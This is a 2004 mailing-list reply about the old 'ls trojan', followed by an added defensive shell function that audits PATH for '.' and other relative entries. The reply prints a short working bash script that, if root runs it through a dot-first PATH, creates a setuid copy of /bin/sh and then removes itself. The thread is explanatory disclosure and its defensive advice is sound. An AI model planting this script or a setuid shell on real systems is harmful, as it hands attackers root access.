Re: [Full-Disclosure] Old LS Trojan?

From: Andrew Farmer (
Date: 12/01/04

  • Next message: Kyle Maxwell: "Re: [Full-Disclosure] who is the jackass?"
    To: "David S. Morgan" <>
    Date: Wed, 1 Dec 2004 14:27:40 -0800

    On 01 Dec 2004, at 12:11, David S. Morgan wrote:
    > I am looking for an old LS trojan, with trojan being a misnomer.
    > Essentially, the scenario is that the admin (root) has a . (dot) in
    > his path. The bad-user knows this, and has crafted an LS shell script
    > (the part that I can't find) that essentially copies /sbin/sh to a
    > hidden directory and then performs some suid majik to make the sh run
    > as if they were root, without needing the root password. The file
    > then removes itself and does the real version of ls.
    > Does anyone remember this one, and have the ls script anywhere? I
    > would like to use it in a demonstration. I know that this has
    > probably been fixed in various ways, but I have "old Unixes" for just
    > such occasions.

    Probably something along the lines of:
    > #!/bin/bash
    > [ `whoami` = root ] || exit
    > cp /bin/sh /bin/suid-sh
    > chmod +s /bin/suid-sh
    > rm $0
    > exec /bin/ls $*

    Note that this would only run if your $PATH _begins_ with '.' - if
    you're going to put '.' in your $PATH, put it _last_.


    Full-Disclosure - We believe in it.
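A defender-side check for the weakness the reply points out, added here as a POSIX sh example that is not from either poster: it walks a PATH string entry by entry and flags '.', empty and other relative entries, distinguishing the case where one is searched before the real binary directories from the milder case where it comes last. The function name check_path and the use of the first argument as the string to audit are this example's own choices.

```shell
#!/bin/sh
# Added example, not from the original thread: audit a PATH string for entries
# that let a file in the current directory shadow a real command.
# A "." or empty entry (leading, trailing or doubled colon) means "current
# directory"; any other relative entry is resolved from the current directory
# too. Position matters: an entry *before* the absolute directories shadows
# every command, one *after* them only catches typos and missing commands.
#
# Return codes: 0 clean, 1 relative entry precedes all absolute entries,
# 2 relative entries present but only after an absolute entry.
check_path() {
    rest=$1
    pos=0
    seen_abs=0
    rc=0
    more=1
    while [ "$more" -eq 1 ]; do
        # Split off one entry; the last one has no ':' after it.
        case "$rest" in
            *:*) entry=${rest%%:*}; rest=${rest#*:} ;;
            *)   entry=$rest; more=0 ;;
        esac
        pos=$((pos + 1))
        case "$entry" in
            /*) seen_abs=1 ;;
            *)
                shown=${entry:-"<empty>"}
                if [ "$seen_abs" -eq 0 ]; then
                    printf 'DANGER: entry %d (%s) is searched before any absolute directory\n' "$pos" "$shown"
                    rc=1
                else
                    printf 'warn: entry %d (%s) is relative; move it last or drop it\n' "$pos" "$shown"
                    if [ "$rc" -eq 0 ]; then rc=2; fi
                fi ;;
        esac
    done
    return "$rc"
}

# Audit the caller's own PATH, or the string given as the first argument.
status=0
check_path "${1:-$PATH}" || status=$?
echo "exit status: $status"
```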
